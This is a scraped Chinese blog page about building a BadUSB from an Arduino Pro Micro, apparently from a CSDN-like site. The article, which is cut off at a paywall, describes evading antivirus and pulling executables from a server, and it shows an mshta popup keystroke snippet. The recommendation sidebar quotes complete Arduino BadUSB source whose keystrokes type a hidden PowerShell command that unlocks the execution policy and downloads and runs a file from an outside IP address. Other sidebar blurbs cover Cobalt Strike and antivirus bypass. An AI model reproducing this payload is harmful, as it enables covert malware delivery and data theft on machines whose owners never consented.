简易BadUSB,攻击效果不简单

最新推荐文章于 2025-06-27 11:14:08 发布
原创 最新推荐文章于 2025-06-27 11:14:08 发布 · 1.2w 阅读 · 59 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#BadUSB

不久前,有小伙伴在实验室捡到一个U盘,想看看是谁的就插在了自己的电脑上,结果出现了安全软件的报毒通知……

也是因为这件事有了制作一个BadUSB的想法,可以在不被杀毒软件发现的情况下进行一些操作。

一、前期准备

Arduino:

这里使用的是BS Micro pro micro leonardo Arduino开发板。

 

Arduino IDE:

 

二、原理

BadUSB插入后会模拟键盘、鼠标对电脑进行操作,通过这些操作可以打开CMD或者Powershell并输入命令,通过这些命令可以进行简单操作或者更深一步从服务器下载文件执行。通过下载的.exe及.ps1等文件可以实现信息窃取、发送邮件等,从而达到控制目标机或者窃取信息等目的。

 

三、过程

(1)实现弹窗

关键代码:

Keyboard.press(KEY_LEFT_GUI);

Keyboard.press('r');

Keyboard.print("mshtavbscript:msgbox(\"lalala\",64,\"lalalatitle\")(window.close)

最低0.47元/天 解锁文章

200万优质内容无限畅学
sectown
关注
疯狂的极客--初识BadUSB
Peter_FHC的博客
05-27 3053
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击,主流有四种工具,本文便对其做简单介绍。
Badusb下载源码
09-24
Badusb下载源码void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("POWERSHELL -NOP -W HIDDEN -C sET-eXECUTIONpOLICY UNRESTRICTED -FORCE;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE('HTTP://182.16.98.84/1.TXT', 'D:1.TXT');START D:1.TXT;EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { }
三步打造黑客级BadUSB
最新发布
Jia ming 的日常学习笔记
06-27 418
本文介绍了如何制作一个简单的BadUSB设备。首先需要安装Arduino IDE开发环境和Teensy驱动程序,Arduino IDE解压即可使用,Teensy驱动安装时需要指定Arduino目录。然后编写模拟键盘操作的代码,包括打开运行窗口、输入cmd命令、执行ipconfig等操作。最后将代码写入硬件设备:将设备插入电脑,选择正确的端口,点击写入按钮完成制作。整个流程包含环境配置、代码编写和硬件烧录三个主要步骤。
BadUSB利用以及免杀(测试bypass某数字卫士)
r250414958的博客
03-03 1250
文章写了有一段时间了,本来打算投稿某网站的,但发现太菜了,索性算了 系统:windows_7_64_专业版 工具:cobalt strike3.14、Teensy++2.0 关于利用方面 我首先就想到了powershell,但是网上的免杀方法已经被杀得七七八八了 但是天无绝人之路,再继续搜索下看到了白色键盘师傅的文章,经过测试可绕过文章发布最新的某数字卫士上线 https://www.temp33.com/bypass%E7%B3%BB%E5%88%97-%E7%BB%95%E8%BF%87360%E6%
u盘插在电脑上没有反应_插一个U盘黑一台电脑Badusb最详细制作教程
weixin_39999536的博客
11-06 1174
文章来源:重生信息安全文章作者:J0o1ey0x001-简介概述在2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态2.Badusb内部结构从这张图便可以了解到--Badusb和普通的U盘并没有什么两...
基于树莓派的多功能USB实现--BadUSB模式
qinguo123的博客
02-06 4959
此文首先发表于微信公众号。具体详情请移步公众号查看:WriteSimpleDemo Github https://github.com/pedroqin/RaspberryPi-based-multi-functional-USB-Device Badusb介绍 BadUSB is a dangerous USB security flaw that allows attackers to ...
badusb.zip_bad usb_badusb_badusb下载_badusb制作教程_badusb脚本开发
09-21
BadUSB的概念由安全研究人员在2014年提出,揭示了USB设备固件的可篡改性,通过修改USB控制器的固件,攻击者可以实现数据窃取、键盘模拟、病毒传播等多种恶意行为。 【描述】中的"badusb制作工具包"表明,这个压缩包...
badusb_badusb_
09-29
【描述】:“badusb资料,需要自行打包带走” 提示了本压缩包包含了关于BadUSB的相关研究和资料,BadUSB是一种针对USB设备的恶意攻击手段,它利用USB设备的可编程性,将普通USB设备伪装成键盘、鼠标或其他设备,对...
badusb代码.zip
07-25
3. **安全漏洞**:了解USB设备固件的常见漏洞,比如不安全的重置过程、权限提升、未加密的数据传输等,这些都可能导致BadUSB攻击。 4. **恶意代码注入**:如何编写和注入恶意代码,使其在USB设备插入电脑时自动执行...
打造基于Linux的廉价badusb攻击.pdf
08-08
许多人在研究badusb中致力于底层的HID USB代码执行上来做文章,本演讲或许可以另辟蹊径带来一次全新的对Badusb攻击的参考。通过搭载Linux的微型嵌入式设备来进行快捷而灵活的攻击以及信息收集。并为各位带来一种新的...
BadUsb制作
qq_34341458的博客
03-09 8626
型号: Digispark kickstarter 微型USB开发板 ATTINY58 就是下面这种 x宝有卖9元左右。 一. 准备: attiny驱动下载:https://www.arduino.cc/en/Main/Software?setlang=cn Arduino IDE:https://www.arduino.cc/en/software 免杀工具(自选):https://github.com/danielbohannon/Invoke-Obfuscation CobaltStrike且有
Bad usb实现U盘攻击
qq_40624810的博客
09-18 7660
1、Bad usb介绍及原理 介绍 BadUSB是利用伪造HID设备执行攻击载荷的一种攻击方式。用户插入BadUSB,就会自动执行预置在固件中的恶意代码,如下载服务器上的恶意文件,执行恶意操作等。由于恶意代码内置于设备初始化固件中,而不是通过autorun.inf等媒体自动播放文件进行控制,因此无法通过禁用媒体自动播放进行防御,杀毒软件更是无法检测设备固件中的恶意代码。这种攻击方式可以在不经意...
IOT黑客入门篇之初探Badusb
网安君的博客
11-14 3696
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击。例如,USB 闪存驱动器可以包含可编程的Intel 8051微控制器,该微控制器可以重新编程,将USB闪存驱动器变成恶意设备。BadUSB 攻击是在 2014 年由Karsten Nohl、Sascha Krißler和Jakob Lell在一次Black Hat演讲中首次披露的。演讲两个月后,其他研究人员发布了可用于利用该漏洞的代码。2017年,USG加密狗1.0版本发布,其作用类似于硬件防火墙,旨在防止BadUSB风格的攻击
自制BadUSB!!(电脑强制关机)
Pleasure1234的博客
01-22 1575
在美剧《黑客军团》中有过这样一个画面,组织成员在警局停车场随机的撒下大量用于钓鱼的 U 盘,然后就发生了下面的画面,然而此时警局的电脑已经被黑,即使断网也已经无济于事了。这就是一种黑客常用的手段 —— 利用 BadUSB 攻击而我今天想要介绍的只是该手段中的其中一种变体,利用了 USB 设备模拟成 HID 设备(Human Interface Device,人机交互设备,比如键盘或鼠标),从而执行代码,进行攻击和数据篡改等操作。下面的图片可以看出它伪装成了人体学输入设备。
Badusb制作及使用(渗透windows)
QQ670663的博客
06-19 9643
目录一、安装Dpinst驱动二、配置Automator三、实现插入Babusb远程渗透win10系统“BadUSB”是计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在BlackHat安全大会上公布。BadUSB最可怕的一点是恶意代码存在于U盘的固件中,由于PC上的杀毒软件无法访问到U盘存放固件的区域,因此也就意味着杀毒软件和U盘格式化都无法应对BadUSB进行攻击。........................
BadUsb使用
问题很多的小明
05-04 1222
学习BadUS
什么是BadUSB攻击以及如何预防
ITmoster的博客
12-09 4759
BadUSB 是带有嵌入式固件的闪存驱动器,可用于重新编程设备并允许它充当人机界面小工具,例如键盘、鼠标或耳机。它们用于通过有效地伪装成人机接口设备 (HID) 在计算机上执行各种操作。换句话说,BadUSB是虚拟键盘,可以预先编程以在计算机上键入字符,而无需物理操作。一旦插入,他们就可以直接开始工作,甚至执行需要同时使用两个或多个键的复杂击键。
BadUSB资料下载与打包指南
此外,badusb攻击不依赖于操作系统漏洞,而是一种硬件级别的攻击方式。 badusb攻击的防范措施包括以下几个方面: 1. 使用可靠的USB设备:只使用信任的USB设备,避免使用来历不明的USB设备。 2. 限制USB设备的权限...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值